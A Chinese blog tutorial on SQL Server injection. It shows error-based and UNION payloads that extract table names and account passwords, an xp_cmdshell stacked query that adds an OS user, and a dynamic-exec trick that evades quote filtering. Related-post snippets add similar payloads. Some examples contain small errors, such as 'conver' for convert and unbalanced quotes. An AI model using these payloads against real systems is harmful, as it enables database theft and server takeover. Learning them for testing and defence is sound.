SQL Server注入

于 2024-06-01 15:00:55 发布
阅读量603 收藏 5
点赞数 16
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80488214/article/details/139373908
版权

1.利用错误消息提取信息

1.1 枚举当前表与列

select * from users where username='root' and password='root' having 1=1--' 
抛出错误:选择列表中的列 'users.id' 无效,因为该列没有包含在聚合函数或 GROUP BY 子句中。

  发现表名为 'users',存在列名为 'id'

select * from users where username='root' and password='root' group by users.id having 1=1--' 
抛出错误:选择列表中的列 'users.username' 无效,因为该列没有包含在聚合函数或 GROUP BY 子句中。

  

可以利用having子句继续递归查询(如:select * from users where username='root' and password='root' group by users.id,users.username having 1=1--' )

原理:凡是在group by后面出现的字段,必须同时在select后面出现;凡是在select后面出现的、同时未在聚合函数中出现的字段,必须同时出现在group by后面。

   在 SQL 中增加 HAVING 子句原因是,WHERE 关键字无法与合计函数一起使用。

1.2 利用数据类型错误提取数据

原理:试图将一个字符串与非字符串基本,或将一个字符串转换为另一个不兼容的类型时,那么SQL编辑器会抛出异常。

select * from users where username='root' and password='root' and 1> (select top 1 username from users)
错误提示:在将 varchar 值 'root' 转换成数据类型 int时失败。

  利用此方法可以递归推导出所有账户信息:

select * from users where username='root' and password='root' and 1> (select top 1 username from users where username not in ('root'))

  不嵌入子查询:常用内置函数(conver或者case函数:将一种数据类型转换为另一种数据类型)

select * from users where username='root' and password='root' and 1=conver(int,(select top 1 username from users))

  也可以通过使用FOR XML PATH 语句将查询的数据生成XML,SQL语句如下:

select * from users where username='root' and password='root' and 1=conver(int,(select stuff((select ','+users.username, '|'+users.password from users for xml path('')),1,1,'')))
错误提示:在将nvarchar值 'root|root,admin|admin,xxser|xxser' 转换成数据类型int时失败

2.获取元数据

SQL Server 常用视图

视    图说    明
sys.databasesSQL Server 中所有数据库
sys.sql_loginsSQL Server 中所有登录名
information_schema.tables当前用户数据库中的表
information_schema.columns当前用户数据库中的列
sys.all_columns用户定义对象和系统对象的所有列的联合
sys.database_principals数据库中每个权限或列异常权限
sys.database_files存储在数据库中的数据库文件
sysobjects数据库中创建的每个对象(例如约束、日志以及存储过程)

3. Order by 子句

  常用来判断表的列数

4. UNION查询

  Union关键字将两个或更多个查询结果组合为单个结果集,即联合查询,基本规则:

  • 所有查询中的列数必须相同
  • 数据类型必须兼容

4.1 联合查询探测字段数

  使用order by子句或者该联合查询语句 得到users表的字段数:

select * from users where id = 1 union select null,null...

4.2 联合查询敏感信息

id=5 union select 'x',null,null,null from sysobject where xtype='U'

  语句执行正常代表数据类型兼容,就可以将x换位SQL语句(如利用视图查询)

  (xtype='U' 查询类型为表,用户定义类型)

5. 常用的函数

函    数说    明
stuff字符串截取函数
ascii取ASCII码
char根据ASCII码取字符
getdate返回日期
count返回组中的总条数
cast将一种数据类型的表达式显式转换为另一种数据类型的表达式
rand返回随机值
is_srvrolemember指示SQL Server登录名是否为指定服务器角色的成员

6. 危险的存储过程

  直接利用CMD创建新用户(要有CONTROL SERVER权限)

select * from table where id=1; exec xp_cmdshell 'net user test test /add'

7. 动态执行

  SQL Server 支持动态执行语句,用户可以提交一个字符串来执行SQL语句,例如:

exec('selec'+'t' username,password fro'+'m users')

  也可以通过定义十六进制的SQL语句,使用exec函数执行。绕过单引号过滤。

余十步
关注
  • 16
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
SQL server注入
weixin_45958861的博客
09-20 1584
较为复杂 一般不用手工 用工具 1.注入语句 ①*判断数据库类型 and exists (select * from sysobjects)–返回正常为mssql(也名sql server) and exists (select count() from sysobjects)–有时上面那个语句不行就试试这个哈 ②判断数据库版本 and 1=@@version–这个语句要在有回显的模式下才可以哦 and substring((select @@version),22,4)=‘2008’–适用
三步堵死 SQL Server注入漏洞
09-11
三步堵死 SQL Server 注入漏洞 SQL Server 注入漏洞是一种常见的 Web 应用程序安全漏洞,攻击者可以通过构造恶意的 SQL 语句来获取或修改数据库中的数据,以获取未经授权的访问权限。为防止 SQL Server 注入漏洞,...
SQL Server手工注入方式
good good study
01-04 5661
本文详细的介绍了Sql Server安全基础,包括环境搭建,T-sql语法,sqlserver用户权限,以及sqlserver注入的方法和提权方式。 Microsoft SQL Server(微软结构化查询语言服务器),也叫Mssql,是由美国微软公司所推出的关系型数据库。默认端口号为1433常见版本如下版本年份发布名称8.02000年8.02003年SQL Server 2000 64-bit版本9.02005年10.02008年10.252009年SQL Azure。
SQL Server注入大全及防御
网络 人生 学习 进步
09-17 1418
  SQL Server是中小型网站广泛使用的数据库,由于功能强大也滋生了很多安全问题,国内又因为SQL注入攻击的很长一段时间流行,导致对SQL Server的入侵技巧也层出不穷,由于SQL Server支持多语句,相信很多小黑在对SQL Server进去SQL注入的时候很少使用猜解表名之类的方法,而直接转向使用SQL Server的存储过程和函数快速的拿权限,下面我就围绕SQL Server的系
SQL Server 注入
mingyqf的博客
03-22 2393
SQL Server 注入 (转至:https://www.1024sou.com/article/798425.html) 侵删 一、简介 SQL Server数据库是由Microsoft开发和推广的关系数据库管理系统(DBMS),是一个比较大型的数据库。端口号为1433。数据库后缀名 .mdf,注释符是 – sa权限:数据库操作,文件管理,命令执行,注册表读取等 (数据库最高权限system) db权限:文件管理,数据库操作等权限 users-administrators **public权限:**数
SQL-Server注入
qq_41781465的博客
08-17 130
col_name():可以根据id值得到对像的名称,而且可以返回指定下标的结果 ————————————————————object_id()只能返回用户创建的对像的ID,像以sys开头的表都是系统表所以返回不了的。特性:union all select 联合查询要加all。记录了数据库中所有表的字段,常⽤字段为id、name和xtype。object_id(name)可以根据表对象名称得到表对象的ID,:记录了数据库中所有表,常⽤字段为id、name和xtype。@@version 版本。
sqlserver驱动jar
11-23
String url = "jdbc:sqlserver://localhost:1433;databaseName=myDatabase"; String username = "myUsername"; String password = "myPassword"; try { Class.forName(...
SQLServer注入程序Delphi无控件版
05-18
内容索引:Delphi源码,数据库应用,注入 SQLServer注入程序Delphi无控件版,对"asp?id=169"如果169为文字型,也可注入,而且 程序没有使用三方控件,方便编译,使用时请按照获取[SQL Server信息]、[获取表名]、[获取...
整理出来的SQL注入点关键字
03-06
整理出来的关于SQL注入时所需要的关键字,很全面,覆盖了很多,包括asp,php等等
专门针对SQL Server注入手段
Wayne_Deng的专栏
07-13 1288
小弟潜心研究sql injection一个余月,发现国内存在sql injection漏洞的网站一大把一大把,80%以上的asp网站都似乎是不学无术、骗吃骗喝的“程序员”所做。不光漏洞多,而且网站内部结构也是零乱无比…… 关于sql injection网上流传甚广的SQL注入天书可以说是非常不错的入门介绍了,在这里也要重复一些老套的手法。 首先上手的都是1=1,1=2的方法测试验证漏洞,字符则用
SQL server 中的SQL 注入
d1996a的博客
09-27 399
SQL server 中的sql注入 实验环境: 在windows server 2008虚拟机中安装SQL server 数据库。安装phpstudy ,通过一台Windows7 访问连接windows server 2008. SQL server 联合注入 首先判断注入点,输入id=1,页面正常回显。 首先判断是否是数值型: id=1 and 1=1,页面正常回显 id=1 and 1=2,页面空显示,可以判断是数值型。 因为有显示位,可以用联合注入进行注入。 首先判断显示位,由此可以看出显示位
2004-8-5+ 给mssql添加用户
weixin_34113237的博客
06-29 90
打开管理器,找到需要添加用户的数据库,点开,右键单击用户,选择“新建数据库用户”,弹出“数据库用户属性-新建用户”,填好登陆名和用户名,分配好角色,然后就可以啦。先看登陆名。一般从下拉列表里选“新建”,跳出“sql server登录属性-新建登录”,然后在这里填名称,设定sel servr身份验证的密码,然后从下拉列表里选一个数据库,就是你要添加用户的那个,完事后确定。这样在登陆名下拉列表就会多出...
SQL注入--sql server
pygain的博客
10-04 909
谈到SQL注入,不得不提它的本质,把用户的输入数据当做代码来执行。两个关键条件,第一个是用户能够控制的输入;第二个是程序要执行的代码,拼接了用户输入的数据 按照注入的技术类型可分解为: 显错注入和盲注入,其中盲注入可分为,联合查询注入,堆查询注入,DNS查询注入,报错注入,延时注入和布尔注入。这篇文章重点在分享一些联合查询注入的命令
SQL注入-基于MSsql(sql server)的注入
LJH1999ZN的博客
02-13 5269
目录 一、如何判断该网站使用的是sql server 数据库 二、sql server 数据库包含三张主要系统表 三、sql server 主要函数 四、数据库注入流程 五、sql server 的联合查询 六、sql server 的报错注入 七、sql server 的布尔型盲注。 一、如何判断该网站使用的是sql server 数据库 根据后缀判断:如果后缀为aspx,数据库大概是sql server 根据报错信息判断,报错信息中有Microsoft 字样。 根据系统表判断,a
【网络安全-SQL注入(4)】一篇文章带你了解sql server数据库三大权限,以及三大权限的SQL注入SQL注入点利用以及getshell
最新发布
m0_67844671的博客
10-02 2107
【网络安全-SQL注入SQL注入----一篇文章教你access数据库SQL注入以及注入点利用。SQL注入【3】-CSDN博客本篇文章以凡诺企业网站管理系统为例,讲解了access数据库是如何进行SQL注入的,以及注入点如何利用,如何判断查询字段个数,如果用联合查询爆出数据库数据等;【网络安全-SQL注入SQL注入----一篇文章教你access数据库SQL注入以及注入点利用。SQL注入【3】;
sql注入之——sqlserver报错注入
wsnbbz的博客
02-12 1668
条件 必须有错误回显 函数 convert(int,(select top 1 db_name() )):将第二个参数的值转换成第一个参数的int类型 查看数据库 ?id=1 and 1=convert(int,(select top 1 db_name())) 查看数据库有哪些表 ?id=1 and 1=convert(int,(select top 1 name from test.sys....
在将 nvarchar 值 '' 转换成数据类型 int 时失败
06-08
这是因为你试图将一个空字符串''转换为整数,而空字符串不能转换为整数。如果你想将空字符串视为0,可以使用以下代码: ```SELECT ISNULL(NULLIF('', ''), 0)``` 这将返回0作为整数值。但是请注意,这只适用于空字符串,如果你尝试将包含非数字字符的字符串转换为整数,仍然会失败。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

余十步

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值